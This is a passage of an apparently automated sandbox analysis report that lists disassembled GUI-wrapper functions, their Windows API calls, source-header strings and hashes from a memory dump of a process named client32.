e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110010F1

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastPostProcesswsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 906220102-2830328467
Opcode ID: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
Instruction ID: 934a8ee4ae924c1029923c78eea6d07b507986f249d0d3e5c029bc3c62824ea9
Opcode Fuzzy Hash: 81e23b17fbda055fd9539ba62cc9f5d3a9ce7d810db27e0af83b2e8161869047
Instruction Fuzzy Hash: 98E04FB5A10219BFD704CA85DC46EDAB39CEB48754F00802AF92597200D6B0E84087A0

Uniqueness

Uniqueness Score: -1.00%

Function 11014130 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00001203,?,?), ref: 11014161

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11014143
e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 1101413E

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
API String ID: 819365019-3507600817
Opcode ID: a4e8f6c1e0f0e719e49bb50dc02c9156cf18e10f3a85b9adc6d500caaea46bf6
Instruction ID: ce752b6915aa01a8741080b9e5a2c0ea08f5e284845c2bca3d31cce01905913c
Opcode Fuzzy Hash: a4e8f6c1e0f0e719e49bb50dc02c9156cf18e10f3a85b9adc6d500caaea46bf6
Instruction Fuzzy Hash: 60E08675A502187BD310DA81DC46FD6F39CEB55755F008126F9255A241D670B8408790

Uniqueness

Uniqueness Score: -1.00%

Function 110151A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00001014,?,?), ref: 110151D4

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 110151B6
e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110151B1

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
API String ID: 819365019-3966830984
Opcode ID: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
Instruction ID: 66f1678c741d69056f24fb38e5f1926d93c7d4e0e7c38f0779b183b432510f86
Opcode Fuzzy Hash: 9426acf8e79a86d963c2fc4e4fe9e0b3a848eac582adc7d94dbc3e0bf9044144
Instruction Fuzzy Hash: 26E08675A403197BD310DA81DC46ED6F39CDB45714F008025F9595A240D6B1B94087A0

Uniqueness

Uniqueness Score: -1.00%

Function 110141B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00001201,?,?), ref: 110141E1

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 110141C3
e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 110141BE

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
API String ID: 819365019-3507600817
Opcode ID: 2220ea4d4314ce11eb19b23b232e9ac23e65213a12c5755011ccedf5fcfbd85d
Instruction ID: e40b82f977eb721f415d7ce6a6c2c5c571fa6c694b71c8e0fe353644d2fc67f2
Opcode Fuzzy Hash: 2220ea4d4314ce11eb19b23b232e9ac23e65213a12c5755011ccedf5fcfbd85d
Instruction Fuzzy Hash: C6E0CD75A503187BD710DA81DC86FD7F39CDB54755F00C125FD2556640D670F950C790

Uniqueness

Uniqueness Score: -1.00%

Function 11014230 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00001204,?,?), ref: 11014261

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11014243
e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 1101423E

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
API String ID: 819365019-3507600817
Opcode ID: 4695f712f38e19e96030587a8b7603a3e15687e8071c6d8b407a0c9646f69055
Instruction ID: 55ae1fe25e9a5b1997f1acacac97235014ae2df67c49f839450db2036e8126b3
Opcode Fuzzy Hash: 4695f712f38e19e96030587a8b7603a3e15687e8071c6d8b407a0c9646f69055
Instruction Fuzzy Hash: DDE086796502187BD3109A81DC46ED6F39CDB44765F00C125F9255A240D670B8408790

Uniqueness

Uniqueness Score: -1.00%

Function 11014710 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000101B,?,?), ref: 11014744

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11014726
e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11014721

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
API String ID: 819365019-3966830984
Opcode ID: 194154897d0380713e706b729317de2b6dfbb4a901c537dbd18d92fbe5febeee
Instruction ID: f4a04940886977a4d33c244523c4b49ee99724bc15382a3ab8aa458f91fd6d3d
Opcode Fuzzy Hash: 194154897d0380713e706b729317de2b6dfbb4a901c537dbd18d92fbe5febeee
Instruction Fuzzy Hash: 33E0CD75A003197BD310DA81DC86FD7F3ACEB45714F00C425F9595B641D6B0F940D790

Uniqueness

Uniqueness Score: -1.00%

Function 110147A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000101B,?,?), ref: 110147D4

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 110147B6
e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110147B1

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
API String ID: 819365019-3966830984
Opcode ID: 53ab5b24a322073738cc7837381e228f776e543091f7fe03fc62bfe2f179107d
Instruction ID: dcea86e3b7d47b96aef4dcf1fe9bf2688f3b5c81ad1a1aa2d28696c08be52783
Opcode Fuzzy Hash: 53ab5b24a322073738cc7837381e228f776e543091f7fe03fc62bfe2f179107d
Instruction Fuzzy Hash: 24E08C76A0032ABBE324DA85EC86F97B7ACAB09714F004425F6199B241D6B0E94087A1

Uniqueness

Uniqueness Score: -1.00%

Function 110171F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000101C,?,00000000), ref: 11017222

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11017206
e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 11017201

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
API String ID: 819365019-3966830984
Opcode ID: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
Instruction ID: ca461658ff4ad9fd457e958dedcd80386c4d58b841a73ce1d2056031be29817f
Opcode Fuzzy Hash: 60a1b6a3ee2cbd739f663da181e31c22685e6289d91970e62bf161fdfa926ba2
Instruction Fuzzy Hash: 54E0C275A80329BBE2209681DC42FD6F38C9B05714F004435F6196A182D5B0F4408694

Uniqueness

Uniqueness Score: -1.00%

Function 110141F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00001205,00000000,?), ref: 1101421F

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11014203
e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 110141FE

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
API String ID: 819365019-3507600817
Opcode ID: 45d04b9d47e171c164f04e5fe7f3ce9731aac29ce4d7bf167181722963fe8d9e
Instruction ID: 032d4df9316a5e8283d8688c6328372b319042290bc349747f778d43e7cc2059
Opcode Fuzzy Hash: 45d04b9d47e171c164f04e5fe7f3ce9731aac29ce4d7bf167181722963fe8d9e
Instruction Fuzzy Hash: B3E02B75B903287BD3209A81DC46FD7F39CDB04B55F004035F625AA581E6B1F450C794

Uniqueness

Uniqueness Score: -1.00%

Function 11014270 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00001202,?,00000000), ref: 1101429F

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11014283
e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h, xrefs: 1101427E

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\headctrl.h$m_hWnd
API String ID: 819365019-3507600817
Opcode ID: 6790253aba43e4d2d294870132a24e840559ef9fe61a4894bf3dc9e7539016be
Instruction ID: 7bc1a9946e64f754710be5ebc9e77f2b7f227168eeca9689bda6582359b448ca
Opcode Fuzzy Hash: 6790253aba43e4d2d294870132a24e840559ef9fe61a4894bf3dc9e7539016be
Instruction Fuzzy Hash: 30E0C275A50328BBD2209691DC46FD6F39C9B04755F008036F625AA181D6B0B8408694

Uniqueness

Uniqueness Score: -1.00%

Function 110147E0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000101D,?,00000000), ref: 11014812

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 110147F6
e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h, xrefs: 110147F1

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Message$ErrorExitLastProcessSendwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\listview.h$m_hWnd
API String ID: 819365019-3966830984
Opcode ID: 9bd5d6708678fa6d35662ed678dac9d05df5bbceefec242804b3153e137a2a89
Instruction ID: 5ee4469d1dc4a955e60a650c955cd8ec1572418a0dd6c560bb7d021c9fa58fea
Opcode Fuzzy Hash: 9bd5d6708678fa6d35662ed678dac9d05df5bbceefec242804b3153e137a2a89
Instruction Fuzzy Hash: 7DE02B75A503697BD320D6C1DC46FD7F38C9B05714F004036FA196A580D6B0F440C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 11016170 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20windowCOMMON

Download Yara Rule

APIs

ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 11016198

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

